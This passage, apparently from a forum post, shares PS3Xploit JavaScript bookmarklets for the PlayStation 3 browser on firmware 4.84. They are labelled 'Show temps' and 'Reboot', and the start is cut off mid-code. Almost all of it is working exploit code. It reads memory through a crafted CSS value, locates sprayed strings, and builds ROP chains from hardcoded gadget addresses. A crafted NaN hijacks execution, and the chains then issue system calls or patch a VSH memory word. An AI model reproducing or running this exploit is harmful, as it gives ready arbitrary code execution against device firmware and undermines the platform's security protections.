initROP(a){try{if(a===true){frame_fails=0;search_base_off=0;search_size_ext=0}if(t_out!==0){clearTimeout(t_out);t_out=0}initDefaults();xtra_data=start_x.convert()+unescape("\uFD7E");while(xtra_data_addr===0){if(search_max_threshold\74search_size){load_check();return}xtra_data=xtra_data.replaceAt(0,hexh2bin(0x7EFD));xtra_data_addr=findJsVariableOffset("xtra_data",xtra_data,search_base,search_size);search_max_threshold-=search_size}stack_frame=stack_frame_hookup()+store_word(vsh_opd_addr,vsh_opd_patch)+stack_frame_exit();while(stack_frame_addr===0){if(search_max_threshold\74search_size+search_size_ext){frame_fails++;if((frame_fails%10)===0){search_base_off+=0;search_size_ext+=0}load_check();return}stack_frame=stack_frame.replaceAt(0,hexh2bin(0x2A2F));stack_frame_addr=findJsVariableOffset("stack_frame",stack_frame,search_base+search_base_off,search_size+search_size_ext);if(stack_frame_addr==-1)if(search_max_threshold\74search_size+search_size_ext){frame_fails++;load_check();return}search_max_threshold-=search_size+search_size_ext}jump_2=unescape("\u0102\u7EFB")+fill_by_16bytes(0x30,0x8282)+hexw2bin(stack_frame_addr)+unescape("\uFB7E");while(jump_2_addr===0){if(search_max_threshold\74search_size){load_check();return}jump_2=jump_2.replaceAt(0,hexh2bin(0x7EFB));jump_2_addr=findJsVariableOffset("jump_2",jump_2,search_base,search_size);if(jump_2_addr==-1)if(search_max_threshold\74search_size){load_check();return}search_max_threshold-=search_size}jump_1=unescape("\u4141\u7EFA")+hexw2bin(jump_2_addr)+unescape("\uFA7E");while(jump_1_addr===0){if(search_max_threshold\74search_size){load_check();return}jump_1=jump_1.replaceAt(0,hexh2bin(0x7EFA));jump_1_addr=findJsVariableOffset("jump_1",jump_1,search_base,search_size);if(jump_1_addr==-1)if(search_max_threshold\74search_size){load_check();return}search_max_threshold-=search_size}var b=checkMemory(stack_frame_addr-0x4,0x8000,stack_frame.length);var x=checkMemory(xtra_data_addr-0x4,0x1000,xtra_data.length);var c=checkMemory(jump_2_addr-0x4,0x1000,jump_2.length);var d=checkMemory(jump_1_addr-0x4,0x1000,jump_1.length);if((c===jump_2)&&(d===jump_1)&&(x===xtra_data)&&(b===stack_frame)){if(t_out!==0){clearTimeout(t_out)}triggerX()}else{load_check()}}catch(e){debug=true;debug=false}}function triggerX(){setTimeout(trigger,1000,jump_1_addr);setTimeout(rop_exit,2000,hr);setTimeout(window.close,2000);t_out=0;total_loops=0}initROP(true);');Show temps:
Code:
javascript:eval('var xtra_data,stack_frame,jump_2,jump_1,xtra_data_addr,stack_frame_addr,jump_2_addr,jump_1_addr,debug=!1,ps3xploit_ecdsa_key="948DA13E8CAFD5BA0E90CE434461BB327FE7E080475EAA0AD3AD4F5B6247A7FDA86DF69790196773",index_key="DA7D4B5E499A4F53B1C1A14A7484443B",start_x="xxxx",offset_array=[],t_out=0,ps3xploit_ecdsa_key_addr=0,index_key_addr=0,search_max_threshold=73400320,search_base=2148532224,search_size=2*mbytes,search_base_off=0,search_size_ext=0,gtemp_addr=2365587456,total_loops=0,max_loops=20,frame_fails=0,sp_exit=2413354176,ffs=4294967295,dbyte41=16705,dbyte00=0,byte_size=1,hword_size=2,word_size=4,dword_size=8,mbytes=1048576,stat_size_offset=40,toc_addr=7296336,default_vsh_pub_toc=7263652,vsh_opd_patch=617820,vsh_opd_addr=7256936,vsh_ps3xploit_key_toc=7370612,toc_entry1_addr=7185360,toc_entry2_addr=7494200,toc_entry3_addr=7185352,toc_entry4_addr=7602176,toc_entry5_addr=7255744,toc_entry6_addr=0,gadget1_addr=620036,gadget2_addr=6332484,gadget3_addr=872540,gadget4_addr=2267192,gadget5_addr=1227548,gadget6_addr=6380604,gadget7_addr=131024,gadget8_addr=131072,gadget_mod1_addr=6352696,gadget_mod2_addr=80756,gadget_mod3_addr=757248,gadget_mod4a_addr=890500,gadget_mod7_addr=108204,gadget_mod8_addr=2862264,hr="\74hr\76",gadget12_addr=0x0C864C,ua=navigator.userAgent,fwv=ua.substring(ua.indexOf("5.0 (")+19,ua.indexOf(") Apple"));document.write(\47\74html\76\74head\76\74title\76PS3Xploit - Offline Temperature Reader by lmn7\74/title\76\74/head\76\74body id="bodyId" style="background-color:#FFFFFF"\76\74div id="headerId"\76\74h1\76Reading CELL & RSX temperature values...\74/h1\76\74span id="hideme" style="visibility:hidden"\76\74p\76\74button id="btnROP" type="button" onclick="initROP(true);" autofocus\76Initialize\74/button\76 | Close \74input type="checkbox" id="auto_close" name="aclose" checked="checked" onclick="autoclose();"/\76\74span id="dex_txt" style="visibility:hidden"\76\74input type="checkbox" id="dex" name="DEX" disabled="" onclick="dex();"/\76\74/span\76\74/p\76\74p\76\74button id="btnTrigger" disabled="" type="button" onclick="triggerX();"\76En\74/button\76\74span id="reset" style="visibility:hidden"\76 | \74button id="btnReset" type="button" onclick="disable_trigger();"\76Reset\74/button\76\74/span\76\74/p\76\74/span\76\74div id="exploit" \76\74/div\76\74div id="trigger"\76\74/div\76\74/body\76\74/html\76\47);if(fwv=="4.84"){var toc_addr=7296344,default_vsh_pub_toc=7263660,vsh_opd_patch=617820,vsh_opd_addr=7256944,vsh_toc_addr_screenshot=7472764,vsh_ps3xploit_key_toc=7370860,toc_entry1_addr=7185360,toc_entry2_addr=7494456,toc_entry3_addr=7185352,toc_entry4_addr=7602176,toc_entry5_addr=7255752,toc_entry6_addr=0,gadget1_addr=620036,gadget2_addr=6332644,gadget3_addr=872540,gadget4_addr=2267192,gadget5_addr=1227548,gadget6_addr=6380764,gadget7_addr=131024,gadget8_addr=131072,gadget9_addr=170760,gadget10_addr=6479908,gadget11_addr=5874864,gadget12_addr=820812,gadget13_addr=4777384,gadget14_addr=4769696,gadget15_addr=4758664,gadget_mod1_addr=6352856,gadget_mod2_addr=80756,gadget_mod3_addr=757248,gadget_mod4a_addr=890500,gadget_mod4b_addr=4376440,gadget_mod4c_addr=346864,gadget_mod5_addr=4339932,gadget_mod6_addr=134144,gadget_mod7_addr=108204,gadget_mod8_addr=2862264,gadget_mod9_addr=68384,gadget_mod10_addr=1857428,gadget_mod11_addr=1618244,gadget_mod12_addr=6500860,gadget_mod13_addr=3369072,gadget_mod14_addr=6502656,gadget_mod15_addr=3788856,gadget_mod16_addr=5206828}function hex16(s){return(\470000\47+s).slice(-4)}function s2hex(a){var b=[];var i=0;for(;i\74a.length;i++){b.push(hex16(a.charCodeAt(i).toString(16)))}return b.join("")}function showTemps(){temp_cell=checkTempMem(0x8C000100-0x8,0x100,0x100,10);temp_cell=s2hex(temp_cell).slice(0,4);temp_cell_hex=temp_cell.slice(0,2);temp_cell_hexf=temp_cell.slice(2,4);temp_cell_hexc=parseInt(temp_cell_hexf,16)/256;temp_cell_hex_final=parseInt(temp_cell_hex,16).toString()+"."+temp_cell_hexc.toString();temp_rsx=checkTempMem(0x8C000200-0x8,0x100,0x100,10);temp_rsx=s2hex(temp_rsx).slice(0,4);temp_rsx_hex=temp_rsx.slice(0,2);temp_rsx_hexf=temp_rsx.slice(2,4);temp_rsx_hexc=parseInt(temp_rsx_hexf,16)/256;temp_rsx_hex_final=parseInt(temp_rsx_hex,16).toString()+"."+temp_rsx_hexc.toString();alert("CELL: "+temp_cell_hex_final+" C\\nRSX: "+temp_rsx_hex_final+" C")}function hexh2bin(a){return String.fromCharCode(a)}function hexw2bin(a){return String.fromCharCode(a\76\7616)+String.fromCharCode(a)}function hexdw2bin(a){return hexw2bin(0)+hexw2bin(a)}String.prototype.toHex16=function(){return(\470000\47+this).substr(-4)};String.prototype.toAscii=function(a){var b=\47\47;var i=0;while(i\74this.length){if(a===true){b+=this.charCodeAt(i).toString(16).toHex16()}else{b+=this.charCodeAt(i).toString(16)}i+=1}return b};String.prototype.convert=function(a){if(this.length\741){return\47\47}var b=\47\47;var c=\47\47;var i=0;var d=[];if(a===true){b=this}else{b=this.toAscii()}while((b.length%4)!==0){b+=\4700\47}if(b.substr(b.length-3,2)!==\4700\47){b+=\470000\47}while(i\74b.length){c=b.substr(i,4);d.push(String.fromCharCode(parseInt(c,16)));i+=4}return d.join(\47\47)};String.prototype.convertedSize=function(a){if(this.length\741){return 0}var b=\47\47;if(a===true){b=this}else{b=this.toAscii()}while((b.length%4)!==0){b+=\4700\47}if(b.substr(b.length-3,2)!==\4700\47){b+=\470000\47}return b.length/2};String.prototype.replaceAt=function(a,b){return this.substr(0,a)+b+this.substr(a+b.length)};String.prototype.repeat=function(a){return new Array(a+1).join(this)};Number.prototype.noExponents=function(){var a=String(this).split(/[eE]/);if(a.length===1){return a[0]}var z=\47\47,sign=this\740?\47-\47:\47\47,str=a[0].replace(\47.\47,\47\47),mag=Number(a[1])+1;if(mag\740){z=sign+\470.\47;while(mag++){z+=\470\47}return z+str.replace(/^\-/,\47\47)}mag-=str.length;while(mag--){z+=\470\47}return str+z};function fromIEEE754(a,b,c){var d=0;var g=[];var i;var j;var h;for(i=a.length;i;i-=1){h=a[i-1];for(j=8;j;j-=1){g.push(h%2?1:0);h=h\76\761}}g.reverse();var k=g.join(\47\47);var l=(1\74\74(b-1))-1;var s=parseInt(k.substring(0,1),2)?-1:1;var e=parseInt(k.substring(1,1+b),2);var f=parseInt(k.substring(1+b),2);if(e===(1\74\74b)-1){d=f!==0?NaN:s*Infinity}else if(e\760){d=s*Math.pow(2,e-l)*(1+f/Math.pow(2,c))}else if(f!==0){d=s*Math.pow(2,-(l-1))*(f/Math.pow(2,c))}else{d=s*0}return d.noExponents()}function generateIEEE754(a,b){var c=new Array((a\76\7624)&0xFF,(a\76\7616)&0xFF,(a\76\768)&0xFF,(a)&0xFF,(b\76\7624)&0xFF,(b\76\7616)&0xFF,(b\76\768)&0xFF,(b)&0xFF);return fromIEEE754(c,11,52)}function generateExploit(a,b){var n=(a\74\7432)|((b\76\761)-1);return generateIEEE754(a,(n-a))}function readMemory(a,b){if(document.getElementById(\47exploit\47)){document.getElementById(\47exploit\47).style.src="local("+generateExploit(a,b)+")"}}function checkTempMem(a,b,c,d){if(document.getElementById(\47exploit\47)){readMemory(a,b);return document.getElementById(\47exploit\47).style.src.substr(d,c)}}function checkMemory(a,b,c){if(document.getElementById(\47exploit\47)){readMemory(a,b);if(debug===true){var x=document.getElementById(\47exploit\47).style.src.substr(6,c);return x}return document.getElementById(\47exploit\47).style.src.substr(6,c)}}function trigger(a){if(document.getElementById(\47trigger\47)){document.getElementById("trigger").innerHTML=-parseFloat("NAN(ffffe"+a.toString(16)+")")}}function load_check(){if(total_loops\74max_loops){t_out=setTimeout(initROP,1000,false)}else{total_loops=0;t_out=0}}function findJsVariableOffset(a,b,c,d){readMemory(c,d);var e=document.getElementById(\47exploit\47).style.src.substr(6,d);var i=0;var t;var k;var f;var g;while(i\74(e.length*2)){if(e.charCodeAt(i/2)===b.charCodeAt(0)){f=0;for(k=0;k\74(b.length*2);k+=0x2){if(e.charCodeAt((i+k)/2)!==b.charCodeAt(k/2)){break}f+=1}if(f===b.length){g=c+i+4;for(t=0;t\74offset_array.length;t+=1){if(offset_array[t]===g){return-1}}offset_array.push(g);return g}}i+=0x10}var h=c+d;return 0}function memcpy(a,b,c){return callsub(gadget8_addr,a,b,c,0,0,0,0,0,0,0x70)}function store_word(a,b,c,d,e){if(c===null){c=gtemp_addr}if(d===null){d=gtemp_addr}if(e===null){e=gtemp_addr}return hexdw2bin(gadget_mod3_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(b)+fill_by_8bytes(0x8,dbyte41)+hexdw2bin(a-0xC74)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod7_addr)+fill_by_16bytes(0x70,dbyte41)+hexdw2bin(c)+hexdw2bin(d)+hexdw2bin(e)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function stack_frame_hookup(){return unescape("\u4141\u2A2F")+hexw2bin(gadget1_addr)+hexw2bin(toc_addr)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(toc_addr)+fill_by_16bytes(0x70,dbyte41)}function stack_frame_exit(){return hexdw2bin(gadget_mod8_addr)+unescape("\u2F2A")}function syscall(a,b,c,d,e,f,g,h,i,j){if(j===null){j=gtemp_addr}return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(a)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+hexw2bin(d)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod4a_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(j)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function callsub(a,b,c,d,e,f,g,h,i,j,k,l,m){var n=0x20;if(m===null){m=gtemp_addr}if(l===null){l=gtemp_addr}return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(j)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+hexw2bin(d)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(l)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(a)+fill_by_16bytes(k-n,dbyte00)+hexdw2bin(m)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function fill_by_4bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/4){c+=e.repeat(2);d++}return c}function fill_by_8bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/8){c+=e.repeat(4);d++}return c}function fill_by_16bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/16){c+=e.repeat(8);d++}return c}function initDefaults(){offset_array=[];xtra_data_addr=0;stack_frame_addr=0;jump_2_addr=0;jump_1_addr=0;ps3xploit_ecdsa_key_addr=0;index_key_addr=0;search_max_threshold=70*0x100000;search_base=0x80100000;search_size=2*mbytes;search_size_ext=0*mbytes;search_base_off=0*mbytes;total_loops++}function initROP(a){try{if(a===true){frame_fails=0;search_base_off=0;search_size_ext=0}if(t_out!==0){clearTimeout(t_out);t_out=0}initDefaults();xtra_data=start_x.convert()+unescape("\uFD7E");while(xtra_data_addr===0){if(search_max_threshold\74search_size){load_check();return}xtra_data=xtra_data.replaceAt(0,hexh2bin(0x7EFD));xtra_data_addr=findJsVariableOffset("xtra_data",xtra_data,search_base,search_size);search_max_threshold-=search_size}stack_frame=stack_frame_hookup()+syscall(0x0000017F,0,0x8C000100,0,0,0,0,0,0)+syscall(0x0000017F,1,0x8C000200,0,0,0,0,0,0)+stack_frame_exit();while(stack_frame_addr===0){if(search_max_threshold\74search_size+search_size_ext){frame_fails++;if((frame_fails%10)===0){search_base_off+=0;search_size_ext+=0}load_check();return}stack_frame=stack_frame.replaceAt(0,hexh2bin(0x2A2F));stack_frame_addr=findJsVariableOffset("stack_frame",stack_frame,search_base+search_base_off,search_size+search_size_ext);if(stack_frame_addr==-1)if(search_max_threshold\74search_size+search_size_ext){frame_fails++;load_check();return}search_max_threshold-=search_size+search_size_ext}jump_2=unescape("\u0102\u7EFB")+fill_by_16bytes(0x30,0x8282)+hexw2bin(stack_frame_addr)+unescape("\uFB7E");while(jump_2_addr===0){if(search_max_threshold\74search_size){load_check();return}jump_2=jump_2.replaceAt(0,hexh2bin(0x7EFB));jump_2_addr=findJsVariableOffset("jump_2",jump_2,search_base,search_size);if(jump_2_addr==-1)if(search_max_threshold\74search_size){load_check();return}search_max_threshold-=search_size}jump_1=unescape("\u4141\u7EFA")+hexw2bin(jump_2_addr)+unescape("\uFA7E");while(jump_1_addr===0){if(search_max_threshold\74search_size){load_check();return}jump_1=jump_1.replaceAt(0,hexh2bin(0x7EFA));jump_1_addr=findJsVariableOffset("jump_1",jump_1,search_base,search_size);if(jump_1_addr==-1)if(search_max_threshold\74search_size){load_check();return}search_max_threshold-=search_size}var b=checkMemory(stack_frame_addr-0x4,0x8000,stack_frame.length);var x=checkMemory(xtra_data_addr-0x4,0x1000,xtra_data.length);var c=checkMemory(jump_2_addr-0x4,0x1000,jump_2.length);var d=checkMemory(jump_1_addr-0x4,0x1000,jump_1.length);if((c===jump_2)&&(d===jump_1)&&(x===xtra_data)&&(b===stack_frame)){if(t_out!==0){clearTimeout(t_out)}triggerX()}else{load_check()}}catch(e){debug=true;debug=false}}function triggerX(){setTimeout(trigger,1000,jump_1_addr);setTimeout(showTemps,2000);t_out=0;total_loops=0}initROP(true);');Reboot:
Code:
javascript:eval('var xtra_data,stack_frame,jump_2,jump_1,xtra_data_addr,stack_frame_addr,jump_2_addr,jump_1_addr,debug=!1,ps3xploit_ecdsa_key="948DA13E8CAFD5BA0E90CE434461BB327FE7E080475EAA0AD3AD4F5B6247A7FDA86DF69790196773",index_key="DA7D4B5E499A4F53B1C1A14A7484443B",start_x="xxxx",offset_array=[],t_out=0,ps3xploit_ecdsa_key_addr=0,index_key_addr=0,search_max_threshold=73400320,search_base=2148532224,search_size=2*mbytes,search_base_off=0,search_size_ext=0,gtemp_addr=2365587456,total_loops=0,max_loops=20,frame_fails=0,sp_exit=2413354176,ffs=4294967295,dbyte41=16705,dbyte00=0,byte_size=1,hword_size=2,word_size=4,dword_size=8,mbytes=1048576,stat_size_offset=40,toc_addr=7296336,default_vsh_pub_toc=7263652,vsh_opd_patch=617820,vsh_opd_addr=7256936,vsh_ps3xploit_key_toc=7370612,toc_entry1_addr=7185360,toc_entry2_addr=7494200,toc_entry3_addr=7185352,toc_entry4_addr=7602176,toc_entry5_addr=7255744,toc_entry6_addr=0,gadget1_addr=620036,gadget2_addr=6332484,gadget3_addr=872540,gadget4_addr=2267192,gadget5_addr=1227548,gadget6_addr=6380604,gadget7_addr=131024,gadget8_addr=131072,gadget_mod1_addr=6352696,gadget_mod2_addr=80756,gadget_mod3_addr=757248,gadget_mod4a_addr=890500,gadget_mod7_addr=108204,gadget_mod8_addr=2862264,hr="\74hr\76",gadget12_addr=0x0C864C,sc_sm_shutdown=0x17B,soft_reboot=0x200,ua=navigator.userAgent,fwv=ua.substring(ua.indexOf("5.0 (")+19,ua.indexOf(") Apple"));document.write(\47\74html\76\74head\76\74title\76PS3Xploit - Offline Soft Rebooter by lmn7\74/title\76\74/head\76\74body id="bodyId" style="background-color:#FFFFFF"\76\74div id="headerId"\76\74h1\76Rebooting...\74/h1\76\74span id="hideme" style="visibility:hidden"\76\74p\76\74button id="btnROP" type="button" onclick="initROP(true);" autofocus\76Initialize\74/button\76 | Close \74input type="checkbox" id="auto_close" name="aclose" checked="checked" onclick="autoclose();"/\76\74span id="dex_txt" style="visibility:hidden"\76\74input type="checkbox" id="dex" name="DEX" disabled="" onclick="dex();"/\76\74/span\76\74/p\76\74p\76\74button id="btnTrigger" disabled="" type="button" onclick="triggerX();"\76En\74/button\76\74span id="reset" style="visibility:hidden"\76 | \74button id="btnReset" type="button" onclick="disable_trigger();"\76Reset\74/button\76\74/span\76\74/p\76\74/span\76\74div id="exploit" \76\74/div\76\74div id="trigger"\76\74/div\76\74/body\76\74/html\76\47);if(fwv=="4.84"){var toc_addr=7296344,default_vsh_pub_toc=7263660,vsh_opd_patch=617820,vsh_opd_addr=7256944,vsh_toc_addr_screenshot=7472764,vsh_ps3xploit_key_toc=7370860,toc_entry1_addr=7185360,toc_entry2_addr=7494456,toc_entry3_addr=7185352,toc_entry4_addr=7602176,toc_entry5_addr=7255752,toc_entry6_addr=0,gadget1_addr=620036,gadget2_addr=6332644,gadget3_addr=872540,gadget4_addr=2267192,gadget5_addr=1227548,gadget6_addr=6380764,gadget7_addr=131024,gadget8_addr=131072,gadget9_addr=170760,gadget10_addr=6479908,gadget11_addr=5874864,gadget12_addr=820812,gadget13_addr=4777384,gadget14_addr=4769696,gadget15_addr=4758664,gadget_mod1_addr=6352856,gadget_mod2_addr=80756,gadget_mod3_addr=757248,gadget_mod4a_addr=890500,gadget_mod4b_addr=4376440,gadget_mod4c_addr=346864,gadget_mod5_addr=4339932,gadget_mod6_addr=134144,gadget_mod7_addr=108204,gadget_mod8_addr=2862264,gadget_mod9_addr=68384,gadget_mod10_addr=1857428,gadget_mod11_addr=1618244,gadget_mod12_addr=6500860,gadget_mod13_addr=3369072,gadget_mod14_addr=6502656,gadget_mod15_addr=3788856,gadget_mod16_addr=5206828}function hexh2bin(a){return String.fromCharCode(a)}function hexw2bin(a){return String.fromCharCode(a\76\7616)+String.fromCharCode(a)}function hexdw2bin(a){return hexw2bin(0)+hexw2bin(a)}String.prototype.toHex16=function(){return(\470000\47+this).substr(-4)};String.prototype.toAscii=function(a){var b=\47\47;var i=0;while(i\74this.length){if(a===true){b+=this.charCodeAt(i).toString(16).toHex16()}else{b+=this.charCodeAt(i).toString(16)}i+=1}return b};String.prototype.convert=function(a){if(this.length\741){return\47\47}var b=\47\47;var c=\47\47;var i=0;var d=[];if(a===true){b=this}else{b=this.toAscii()}while((b.length%4)!==0){b+=\4700\47}if(b.substr(b.length-3,2)!==\4700\47){b+=\470000\47}while(i\74b.length){c=b.substr(i,4);d.push(String.fromCharCode(parseInt(c,16)));i+=4}return d.join(\47\47)};String.prototype.convertedSize=function(a){if(this.length\741){return 0}var b=\47\47;if(a===true){b=this}else{b=this.toAscii()}while((b.length%4)!==0){b+=\4700\47}if(b.substr(b.length-3,2)!==\4700\47){b+=\470000\47}return b.length/2};String.prototype.replaceAt=function(a,b){return this.substr(0,a)+b+this.substr(a+b.length)};String.prototype.repeat=function(a){return new Array(a+1).join(this)};Number.prototype.noExponents=function(){var a=String(this).split(/[eE]/);if(a.length===1){return a[0]}var z=\47\47,sign=this\740?\47-\47:\47\47,str=a[0].replace(\47.\47,\47\47),mag=Number(a[1])+1;if(mag\740){z=sign+\470.\47;while(mag++){z+=\470\47}return z+str.replace(/^\-/,\47\47)}mag-=str.length;while(mag--){z+=\470\47}return str+z};function fromIEEE754(a,b,c){var d=0;var g=[];var i;var j;var h;for(i=a.length;i;i-=1){h=a[i-1];for(j=8;j;j-=1){g.push(h%2?1:0);h=h\76\761}}g.reverse();var k=g.join(\47\47);var l=(1\74\74(b-1))-1;var s=parseInt(k.substring(0,1),2)?-1:1;var e=parseInt(k.substring(1,1+b),2);var f=parseInt(k.substring(1+b),2);if(e===(1\74\74b)-1){d=f!==0?NaN:s*Infinity}else if(e\760){d=s*Math.pow(2,e-l)*(1+f/Math.pow(2,c))}else if(f!==0){d=s*Math.pow(2,-(l-1))*(f/Math.pow(2,c))}else{d=s*0}return d.noExponents()}function generateIEEE754(a,b){var c=new Array((a\76\7624)&0xFF,(a\76\7616)&0xFF,(a\76\768)&0xFF,(a)&0xFF,(b\76\7624)&0xFF,(b\76\7616)&0xFF,(b\76\768)&0xFF,(b)&0xFF);return fromIEEE754(c,11,52)}function generateExploit(a,b){var n=(a\74\7432)|((b\76\761)-1);return generateIEEE754(a,(n-a))}function readMemory(a,b){if(document.getElementById(\47exploit\47)){document.getElementById(\47exploit\47).style.src="local("+generateExploit(a,b)+")"}}function checkMemory(a,b,c){if(document.getElementById(\47exploit\47)){readMemory(a,b);if(debug===true){var x=document.getElementById(\47exploit\47).style.src.substr(6,c);return x}return document.getElementById(\47exploit\47).style.src.substr(6,c)}}function trigger(a){if(document.getElementById(\47trigger\47)){document.getElementById("trigger").innerHTML=-parseFloat("NAN(ffffe"+a.toString(16)+")")}}function rop_exit(a){var b=document.getElementById(\47auto_close\47);if(b){if(b.checked===true)window.close()}}function load_check(){if(total_loops\74max_loops){t_out=setTimeout(initROP,1000,false)}else{total_loops=0;t_out=0}}function findJsVariableOffset(a,b,c,d){readMemory(c,d);var e=document.getElementById(\47exploit\47).style.src.substr(6,d);var i=0;var t;var k;var f;var g;while(i\74(e.length*2)){if(e.charCodeAt(i/2)===b.charCodeAt(0)){f=0;for(k=0;k\74(b.length*2);k+=0x2){if(e.charCodeAt((i+k)/2)!==b.charCodeAt(k/2)){break}f+=1}if(f===b.length){g=c+i+4;for(t=0;t\74offset_array.length;t+=1){if(offset_array[t]===g){return-1}}offset_array.push(g);return g}}i+=0x10}var h=c+d;return 0}function memcpy(a,b,c){return callsub(gadget8_addr,a,b,c,0,0,0,0,0,0,0x70)}function store_word(a,b,c,d,e){if(c===null){c=gtemp_addr}if(d===null){d=gtemp_addr}if(e===null){e=gtemp_addr}return hexdw2bin(gadget_mod3_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(b)+fill_by_8bytes(0x8,dbyte41)+hexdw2bin(a-0xC74)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod7_addr)+fill_by_16bytes(0x70,dbyte41)+hexdw2bin(c)+hexdw2bin(d)+hexdw2bin(e)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function stack_frame_hookup(){return unescape("\u4141\u2A2F")+hexw2bin(gadget1_addr)+hexw2bin(toc_addr)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(toc_addr)+fill_by_16bytes(0x70,dbyte41)}function stack_frame_exit(){return hexdw2bin(gadget_mod8_addr)+unescape("\u2F2A")}function syscall(a,b,c,d,e,f,g,h,i,j){if(j===null){j=gtemp_addr}return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(a)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+hexw2bin(d)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod4a_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(j)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function callsub(a,b,c,d,e,f,g,h,i,j,k,l,m){var n=0x20;if(m===null){m=gtemp_addr}if(l===null){l=gtemp_addr}return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(j)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+hexw2bin(d)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(l)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(a)+fill_by_16bytes(k-n,dbyte00)+hexdw2bin(m)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function fill_by_4bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/4){c+=e.repeat(2);d++}return c}function fill_by_8bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/8){c+=e.repeat(4);d++}return c}function fill_by_16bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/16){c+=e.repeat(8);d++}return c}function initDefaults(){offset_array=[];xtra_data_addr=0;stack_frame_addr=0;jump_2_addr=0;jump_1_addr=0;ps3xploit_ecdsa_key_addr=0;index_key_addr=0;search_max_threshold=70*0x100000;search_base=0x80100000;search_size=2*mbytes;search_size_ext=0*mbytes;search_base_off=0*mbytes;total_loops++}function initROP(a){try{if(a===true){frame_fails=0;search_base_off=0;search_size_ext=0}if(t_out!==0){clearTimeout(t_out);t_out=0}initDefaults();xtra_data=start_x.convert()+unescape("\uFD7E");while(xtra_data_addr===0){if(search_max_threshold\74search_size){load_check();return}xtra_data=xtra_data.replaceAt(0,hexh2bin(0x7EFD));xtra_data_addr=findJsVariableOffset("xtra_data",xtra_data,search_base,search_size);search_max_threshold-=search_size}stack_frame=stack_frame_hookup()+callsub(gadget12_addr,2,0,0,0,0,0,0,0,0,0x80)+syscall(sc_sm_shutdown,soft_reboot,0,0,0,0,0,0,0)+stack_frame_exit();while(stack_frame_addr===0){if(search_max_threshold\74search_size+search_size_ext){frame_fails++;if((frame_fails%10)===0){search_base_off+=0;search_size_ext+=0}load_check();return}stack_frame=stack_frame.replaceAt(0,hexh2bin(0x2A2F));stack_frame_addr=findJsVariableOffset("stack_frame",stack_frame,search_base+search_base_off,search_size+search_size_ext);if(stack_frame_addr==-1)if(search_max_threshold\74search_size+search_size_ext){frame_fails++;load_check();return}search_max_threshold-=search_size+search_size_ext}jump_2=unescape("\u0102\u7EFB")+fill_by_16bytes(0x30,0x8282)+hexw2bin